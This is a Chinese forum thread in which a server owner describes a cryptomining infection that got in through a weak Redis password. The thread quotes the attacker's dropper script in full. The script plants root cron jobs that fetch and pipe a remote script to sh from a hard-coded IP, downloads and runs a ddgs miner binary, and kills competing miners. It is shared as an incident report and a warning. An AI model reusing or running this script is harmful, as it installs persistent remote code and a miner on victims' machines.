linux cpu占用异常，多次登录失败记录，请大佬分析一下

最近突然发现一个阿里云服务器cpu占用异常，而且短时间内有多次登录失败记录;请问有人了解吗？

几分钟没有登录就已经有三百多次失败记录
使用top查看发现该进程

该进程的运行文件是一个在/tmp/文件夹下的qW3xT可执行文件

查看进程树如下

阅读 5.7k

谢谢两位大佬，确实是个挖矿脚本，被设置了定时任务，经验不足。
应该是redis密码太弱，被扫到了，希望大家设置redis不要使用简单密码，执行脚本我下下来了

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

echo "*/5 * * * * curl -fsSL http://165.225.157.157:8000/i.sh | sh" > /var/spool/cron/root
echo "*/5 * * * * wget -q -O- http://165.225.157.157:8000/i.sh | sh" >> /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "*/5 * * * * curl -fsSL http://165.225.157.157:8000/i.sh | sh" > /var/spool/cron/crontabs/root
echo "*/5 * * * * wget -q -O- http://165.225.157.157:8000/i.sh | sh" >> /var/spool/cron/crontabs/root

ps auxf | grep -v grep | grep /tmp/ddgs.3011 || rm -rf /tmp/ddgs.3011
if [ ! -f "/tmp/ddgs.3011" ]; then
    curl -fsSL http://165.225.157.157:8000/static/3011/ddgs.$(uname -m) -o /tmp/ddgs.3011
fi
chmod +x /tmp/ddgs.3011 && /tmp/ddgs.3011

ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep hashvault.pro | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep nanopool.org | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep minexmr.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep /boot/efi/ | awk '{print $2}' | xargs kill

供参考
另外发现在reids被利用之后，有一个ip每几分钟就会尝试登录服务器，持续到现在

linux cpu占用异常，多次登录失败记录，请大佬分析一下

最近突然发现一个阿里云服务器cpu占用异常，而且短时间内有多次登录失败记录;请问有人了解吗？

你尚未登录，登录后可以

cURL error 77: error setting certificate file: /etc/ssl/certs/ca-certificates.crt 如何处理?

WGCLOUD的数据表监控频率在哪儿配置?

国产龙芯架构服务器能否安装AMH面板？

腾讯为什么至今未推出（开放）企业微信Linux版？

鸿蒙应用批量安装失败，报错“invalid signature”如何解决？

ubuntu官方制作的ova格式的虚拟机的默认账号是多少？

nginx子目录下的html文件的静态文件如何按本目录访问？